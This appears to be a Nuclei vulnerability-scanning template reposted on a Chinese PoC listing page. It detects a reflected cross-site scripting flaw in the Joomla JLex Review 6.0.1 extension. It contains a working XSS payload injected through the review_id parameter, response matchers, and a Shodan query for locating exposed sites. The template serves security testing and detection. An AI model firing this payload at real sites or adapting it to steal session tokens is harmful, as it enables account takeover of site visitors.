漏洞描述
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
joomla-jlex-xss: Joomla JLex Review 6.0.1 - Cross-Site Scripting
PoC代码[已公开]
id: joomla-jlex-xss
info:
name: Joomla JLex Review 6.0.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://www.exploitalert.com/view-details.html?id=39732
- https://www.exploit-db.com/exploits/51645
- https://extensions.joomla.org/extension/jlex-review/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1950415971
tags: joomla,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="/?itwed"onmouseover="confirm(document.domain)"style='
- 'jlex-review'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cfc1ea138f24a93c0e71c831ecbd4cdb4da0bb82987356d46520809187b2f98302210090730cf9af48ae5195c83b10f8cd924a366b9c7a206731a2c0dd49d5e22cefee:922c64590222798bb761d5b6d8e72950